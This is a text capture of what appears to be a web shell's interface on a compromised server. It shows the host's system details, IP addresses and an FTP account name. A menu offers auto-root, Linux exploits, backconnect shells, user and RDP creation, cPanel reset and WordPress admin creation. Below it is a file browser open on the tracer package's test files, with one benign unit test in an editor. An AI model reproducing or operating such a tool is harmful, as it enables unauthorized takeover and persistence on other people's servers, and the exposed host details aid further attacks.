Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.186
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.6 /
site-packages /
tracer /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
__meta__.py
310
B
-rw-r--r--
test_FilenameCleaner.py
942
B
-rw-r--r--
test_alpm.py
1.29
KB
-rw-r--r--
test_applications.py
3.91
KB
-rw-r--r--
test_collections.py
2.4
KB
-rw-r--r--
test_dnf.py
1.29
KB
-rw-r--r--
test_dpkg.py
1.26
KB
-rw-r--r--
test_hooks.py
1.01
KB
-rw-r--r--
test_lang.py
238
B
-rw-r--r--
test_package.py
371
B
-rw-r--r--
test_portage.py
1.28
KB
-rw-r--r--
test_processes.py
2.03
KB
-rw-r--r--
test_query.py
574
B
-rw-r--r--
test_rules.py
2.19
KB
-rw-r--r--
test_tracer.py
3.4
KB
-rw-r--r--
test_views.py
9.78
KB
-rw-r--r--
test_yum.py
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_FilenameCleaner.py
from unittest import TestCase from tracer.resources.FilenameCleaner import FilenameCleaner class TestFilenameCleaner(TestCase): def setUp(self): self.cleaner = FilenameCleaner() def test_strip(self): self.assertEqual("/lib/libdl.so", self.cleaner.strip("/lib/libdl-2.19.so")) self.assertEqual("/lib/libncurses.so", self.cleaner.strip("/lib/libncurses.so.5.9")) self.assertEqual("/bin/bash", self.cleaner.strip("/bin/bash")) self.assertEqual("/usr/share/wicd/curses/wicd-curses.py", self.cleaner.strip("/usr/share/wicd/curses/wicd-curses.py")) self.assertEqual("/usr/bin/gvim", self.cleaner.strip("/usr/bin/gvim#new (deleted)")) self.assertEqual("/usr/lib64/kde4/kded_networkmanagement.so", self.cleaner.strip("/usr/lib64/kde4/kded_networkmanagement.so;53c7cd86") ) self.assertEqual("/usr/lib64/firefox/plugin-container", self.cleaner.strip("/usr/lib64/firefox/plugin-container.#prelink#.N3n7Rk (deleted)") )
Close